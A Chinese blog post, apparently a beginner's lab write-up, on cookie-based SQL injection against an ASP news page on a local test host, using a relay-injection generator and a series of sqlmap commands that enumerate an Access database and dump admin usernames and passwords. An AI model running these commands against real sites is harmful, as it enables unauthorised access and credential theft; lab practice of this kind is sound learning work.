首页 > 其他 > 详细

cookie中转注入

时间:2019-07-16 14:40:42      阅读:88      评论:0      收藏:0      [点我收藏+]

用这个源码搭建网站找注入点
http://192.168.226.129/shownews.asp?id=235

判断注入点,在后面加上‘
http://192.168.226.129/shownews.asp?id=235‘

技术分享图片

 

做了简单的防注,我理解的有两种方法注入

方法一
工具
注入中转生成器+asp软件netbox+啊D
用注入中转生成器设置

 

技术分享图片

 

生成的asp源码放在目录wwwroot下,用asp软件netbox发布本地的网站

 

技术分享图片

 

访问本地网站

 

技术分享图片

 

用啊D,就可以注入成功

 

技术分享图片

 

方法二:
工具 
sqlmap

注入点http://192.168.226.129/shownews.asp?id=234

1 判断是否可注
sqlmap.py -u "http://192.168.226.129/shownews.asp" --cookie "id=234"

 

技术分享图片

 

2 爆数据库
sqlmap.py -u "http://192.168.226.129/shownews.asp" --cookie "id=234"  --dbs

 

技术分享图片

 

3. 爆表
sqlmap.py -u "http://192.168.226.129/shownews.asp" --cookie "id=234"  --tables 

 

技术分享图片

 

4. 爆字段
sqlmap.py -u "http://192.168.226.129/shownews.asp" --cookie "id=234"  --columns -D "Microsoft_Access_masterdb"  -T "admin"

 

技术分享图片

 

5爆账号密码
sqlmap.py -u "http://192.168.226.129/shownews.asp" --cookie "id=234"  --dump -D "Microsoft_Access_masterdb"  -T "admin"  -C "username,password"

 

技术分享图片

 

总结,方法一有点麻烦,方法二很简单,不得不得感叹,sqlmap的强大
小白新手上路,如果有错的,希望各位大佬指出啊,谢谢

 

cookie中转注入

原文:https://www.cnblogs.com/lanyincao/p/11194532.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!